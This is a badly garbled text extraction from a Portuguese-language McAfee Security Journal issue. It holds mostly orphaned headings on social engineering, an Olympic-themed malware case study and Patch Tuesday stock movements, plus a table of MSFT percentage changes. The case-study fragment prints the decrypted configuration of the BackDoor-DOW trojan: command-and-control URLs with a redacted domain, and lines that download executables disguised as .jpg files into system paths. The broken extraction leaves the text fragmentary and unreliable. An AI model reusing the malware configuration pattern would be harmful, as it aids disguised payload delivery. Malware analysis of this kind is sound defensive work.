Figura 3: Linha cronolgica de eventos signicativos de engenharia social.

John Wiley & Sons, Inc.

McAFEE SECURITY JOURNAL

Pea e voc receber

Uma histria de dois crebros

Teorias da engenharia social

Despertar propenses cognitivas

Atalhos mentais indevidos

McAFEE SECURITY JOURNAL

Erros causais em esquemas

McAFEE SECURITY JOURNAL

Engenharia social 2.0: Qual a prxima

As defesas modelam os ataques

Fraude de Internet: um crime scio-tecnolgico

BBB CASE #569822971

McAFEE SECURITY JOURNAL

Um alvo preferencial para o malware de engenharia social

McAFEE SECURITY JOURNAL

Por que as Olimpadas?

Estudo de caso: Um ataque de malware olmpico

Sponsors declaration of responsibility at the 2008 Beijing Olympic Games

McAFEE SECURITY JOURNAL

http://www1.palms[removido]/ld/v2/loginv2.asp?hi=2wsdf351&x =0720080510150323662070000000&y=192.168.1.122&t1=ne http://www1.palms[removido]/ld/v2/votev2.asp?a=7351ws2&s= 0720080510150323662070000000&t1=ne http://www1.palms[removido]/ld/v2/logoutv2.asp?p=s9wlf1&s= 0720080510150323662070000000&t1=ne

C:\Documents and Settings\All Users\DRM\drmv021.lic C:\Documents and Settings\All Users\DRM\avp01.lic

Figura 3: A verso no criptografada do BackDoor-DOW.

Software e sites nocivos

@n11@http://www1.palms[removido]/ld/v2/sy64. jpg@%SystemRoot%\Dnservice.exe@218c663bea3723a3dc9d3 02f7a58aeb1@ @n11@http://www1.palms[removido]/ld/v2/200764.jpg @%SystemRoot%\Soundmax.exe@5f3c02fd4264f3eaf3ceebfe 94ffd48c@.

McAFEE SECURITY JOURNAL

Vulnerabilidades nos mercados de aes

As pessoas esto ganhando dinheiro com a Patch Tuesday?

McAFEE SECURITY JOURNAL

VARIAO DA MSFT DA ABERTURA MNIMA

-0,17% -0,20% -0,43% -0,45% 0,16% 0,37% 0,49% -0,18% -0,40%

0,06% 0,07% -0,12% -0,29% 0,05% 0,15% 0,21% 0,44% 0,51%

0,08% 0,08% -0,08% -0,11% -0,03% -0,01% 0,27% 0,29% 0,26%

-1,35% -1,39% -1,24% -1,58% -1,16% -1,01% -0,91% -1,39% -1,56%

-0,89% -0,90% -1,24% -0,99% -0,81% -0,76% -0,74% -0,78% -0,79%

-0,64% -0,64% -0,36% -0,93% -0,74% -0,68% -0,47% -0,51% -0,54%

1,28% 1,34% 0,93% 0,92% 1,35% 1,50% 1,52% 1,25% 1,17%

0,97% 0,95% 1,08% 0,98% 1,01% 1,02% 1,30% 1,24% 1,23%

0,88% 0,88% 0,58% 0,67% 0,92% 0,99% 0,70% 0,92% 0,95%

Alavancagem do volume de aes como indicador

Spreads de lucro potencial

Intraday mxima 1,28% 0,92% 1,52%